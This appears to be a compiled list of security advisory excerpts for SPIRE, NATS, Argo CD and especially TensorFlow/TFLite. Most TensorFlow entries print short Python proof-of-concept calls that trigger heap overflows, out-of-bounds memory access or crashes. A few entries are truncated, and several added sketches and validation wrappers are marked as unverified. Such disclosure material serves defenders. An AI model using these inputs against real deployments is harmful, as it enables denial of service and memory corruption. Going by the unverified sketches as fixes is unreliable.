In SPIRE 0.8.1 through 0.8.4 and before versions 0.9.4, 0.10.2, 0.11.3 and 0.12.1, specially crafted requests to the FetchX509SVID RPC of SPIRE Server’s Legacy Node API can result in the possible issuance of an X.509 certificate with a URI SAN for a SPIFFE ID that the agent is not authorized to distribute. Proper controls are in place to require that the caller presents a valid agent certificate that is already …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2021-3127.txt) Problem Description The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT …
Impact If your installation is using the export-importer service, there is potential impact. If your installation is not importing keys via the export-importer service, your installation is not impacted. In versions 0.19.1 and earlier, the export-importer service assumed that the server it was importing from had properly embargoed keys for at least 2 hours after their expiry time. There are now known instances of servers that did not properly embargo …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-28466.txt) Problem Description An export/import cycle between accounts could crash the nats-server, after consuming CPU and memory. This issue was fixed publicly in https://github.com/nats-io/nats-server/pull/1731 in November 2020. The need to call this out as a security issue was highlighted by snyk.io and we are grateful for their assistance in doing so. Organizations which run a NATS service providing access to accounts run by untrusted third parties …
Impact When Argo CD was connected to a Helm OCI repository with authentication enabled, the credentials used for accessing the remote repository were logged. Anyone with access to the pod logs - either via access with appropriate permissions to the Kubernetes control plane or a third party log management system where the logs from Argo CD were aggregated - could have potentially obtained the credentials to the Helm OCI repository. …
If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\ size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\ binary_output=False)
Passing empty input_min and input_max tensors to tf.raw_ops.RequantizationRange can cause reads outside the bounds of heap allocated data: import tensorflow as tf input = tf.constant([1], shape=[1], dtype=tf.qint32) input_max = tf.constant([], dtype=tf.float32) input_min = tf.constant([], dtype=tf.float32) tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)
An attacker can force accesses outside the bounds of heap allocated arrays by passing in invalid tensor values to tf.raw_ops.RaggedCross
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32) argmax = tf.constant([1], shape=[1], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)
An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) t_min = tf.constant([], shape=[0], dtype=tf.float32) t_max = tf.constant([], shape=[0], dtype=tf.float32) m = tf.constant([1], shape=[1], dtype=tf.quint8) m_min = tf.constant([], shape=[0], dtype=tf.float32) m_max = tf.constant([], shape=[0], dtype=tf.float32) v = tf.constant([1], shape=[1], dtype=tf.quint8) v_min = tf.constant([], shape=[0], dtype=tf.float32) v_max = tf.constant([], shape=[0], dtype=tf.float32) …
A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of ArgMin/ArgMax: TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } If axis_value is not a value between 0 and NumDimensions(input), then the condition in the if is never true, so …
The implementations of the Minimum and Maximum TFLite operators can be used to read data outside of bounds of heap allocated objects, if any of the two input tensor arguments are empty.
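A rough sketch of how such a model might be exercised from Python (illustrative only, not a verified reproducer; conversion and interpreter details can vary across TensorFlow versions):
import tensorflow as tf

# Build a tiny model whose single operator is Minimum.
@tf.function(input_signature=[
    tf.TensorSpec(shape=[None], dtype=tf.float32),
    tf.TensorSpec(shape=[None], dtype=tf.float32),
])
def minimum_fn(a, b):
    return tf.minimum(a, b)

converter = tf.lite.TFLiteConverter.from_concrete_functions([minimum_fn.get_concrete_function()])
tflite_model = converter.convert()

# Resize one input to be empty before invoking the interpreter.
interpreter = tf.lite.Interpreter(model_content=tflite_model)
inputs = interpreter.get_input_details()
interpreter.resize_tensor_input(inputs[0]['index'], [0])
interpreter.resize_tensor_input(inputs[1]['index'], [1])
interpreter.allocate_tensors()
interpreter.invoke()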
A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of Split_V: const int input_size = SizeOfDimension(input, axis_value); If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array: inline int SizeOfDimension(const TfLiteTensor* t, int dim) { return t->dims->data[dim]; }
Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data: import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …
An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3: import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3)
Due to lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can exploit an undefined behavior if input arguments are empty: import tensorflow as tf shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) default_value = tf.constant(404, dtype=tf.int64) row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64) rows = [row] types = ['ROW_SPLITS'] tf.raw_ops.RaggedTensorToTensor( shape=shape, values=values, default_value=default_value, row_partition_tensors=rows, row_partition_types=types)
An attacker can access data outside of bounds of heap allocated array in tf.raw_ops.UnicodeEncode: import tensorflow as tf input_values = tf.constant([58], shape=[1], dtype=tf.int32) input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) output_encoding = "UTF-8" tf.raw_ops.UnicodeEncode( input_values=input_values, input_splits=input_splits, output_encoding=output_encoding)
An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32) out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32) tf.raw_ops.Dilation2DBackpropInput( input=input_tensor, filter=filter, out_backprop=out_backprop, strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')
An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams: import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …
An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([0.0], dtype=np.float32) dense_shape = [0, 0] st = tf.SparseTensor(indices_array, value_array, dense_shape) values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape)
An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit: import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1)
An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor: import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …
If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)
An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization: import tensorflow as tf images = tf.constant([], shape=[0], dtype=tf.qint32) size = tf.constant([], shape=[0], dtype=tf.int32) min = tf.constant([], dtype=tf.float32) max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)
An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization: import tensorflow as tf tensor = tf.constant([], dtype=tf.qint32) shape = tf.constant([], dtype=tf.int32) input_min = tf.constant([], dtype=tf.float32) input_max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)
An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization: import tensorflow as tf x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) min_x = tf.constant([], dtype=tf.float32) max_x = tf.constant([], dtype=tf.float32) min_y = tf.constant([], dtype=tf.float32) max_y = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPoolGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding, explicit_paddings=[])
The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow: import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …
The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False)
Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows:

import tensorflow as tf

input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32)
filter_tensor = tf.constant([734.6274508233133] + [-10.0] * 23,
                            shape=[4, 1, 6, 1, 1], dtype=tf.float32)
out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32)

tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor,
                                 out_backprop=out_backprop, …
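One of the missing checks is that the channel counts carried by the three arguments agree. As a hypothetical illustration (not the upstream validation), a wrapper could verify that input_sizes' channel dimension matches the filter's in_channels and that out_backprop's channels match the filter's out_channels, assuming the [depth, height, width, in_channels, out_channels] filter layout; in the proof of concept, input_sizes declares 2 input channels while the filter declares 1:

import tensorflow as tf

def checked_conv3d_backprop_input_v2(input_sizes, filter_tensor, out_backprop, **kwargs):
    # Hypothetical pre-check: channel counts must be mutually consistent.
    in_channels = int(input_sizes[4])  # input_sizes = [N, D, H, W, C]
    if in_channels != int(filter_tensor.shape[3]):
        raise ValueError("input_sizes channels must match the filter's in_channels")
    if int(out_backprop.shape[4]) != int(filter_tensor.shape[4]):
        raise ValueError("out_backprop channels must match the filter's out_channels")
    return tf.raw_ops.Conv3DBackpropInputV2(
        input_sizes=input_sizes, filter=filter_tensor,
        out_backprop=out_backprop, **kwargs)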
An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter:

import tensorflow as tf

input_tensor = tf.constant([386.078431372549, 386.07843139643234],
                           shape=[1, 1, 1, 2], dtype=tf.float32)
filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32)

tf.raw_ops.Conv2DBackpropFilter(
    input=input_tensor,
    filter_sizes=filter_sizes,
    out_backprop=out_backprop,
    strides=[1, 66, 49, 1],
    use_cudnn_on_gpu=True,
    padding='VALID',
    explicit_paddings=[],
    data_format='NHWC',
    dilations=[1, 1, 1, 1])

Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …
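As with the Conv3D case, a hypothetical caller-side check (illustrative only, not the library's fix) can catch the channel mismatch in the first proof of concept, where the NHWC input carries 2 channels but filter_sizes declares in_channels = 1 under the [height, width, in_channels, out_channels] layout:

import tensorflow as tf

def checked_conv2d_backprop_filter(input_tensor, filter_sizes, out_backprop, **kwargs):
    # Hypothetical pre-check for NHWC inputs: channel counts must line up.
    if int(input_tensor.shape[3]) != int(filter_sizes[2]):
        raise ValueError("input channels must match filter_sizes in_channels")
    if int(out_backprop.shape[3]) != int(filter_sizes[3]):
        raise ValueError("out_backprop channels must match filter_sizes out_channels")
    return tf.raw_ops.Conv2DBackpropFilter(
        input=input_tensor, filter_sizes=filter_sizes,
        out_backprop=out_backprop, **kwargs)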
An attacker can trigger a heap buffer overflow in the Eigen implementation of tf.raw_ops.BandedTriangularSolve:

import tensorflow as tf
import numpy as np

matrix_array = np.array([])
matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array, (0, 1)), dtype=tf.float32)
rhs_array = np.array([1, 1])
rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array, (1, 2)), dtype=tf.float32)

tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor, rhs=rhs_tensor)
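A hypothetical pre-check (an illustrative sketch, not the upstream fix) could refuse the empty banded matrix the proof of concept supplies, assuming the op's convention that matrix has shape [..., num_bands, size] with at least one band and that size matches rhs' second-to-last dimension:

import tensorflow as tf

def checked_banded_triangular_solve(matrix, rhs, **kwargs):
    # Hypothetical pre-checks under the assumptions stated above.
    if int(tf.size(matrix)) == 0:
        raise ValueError("matrix must be non-empty (at least one band)")
    if matrix.shape[-1] != rhs.shape[-2]:
        raise ValueError("matrix size must match rhs' second-to-last dimension")
    return tf.raw_ops.BandedTriangularSolve(matrix=matrix, rhs=rhs, **kwargs)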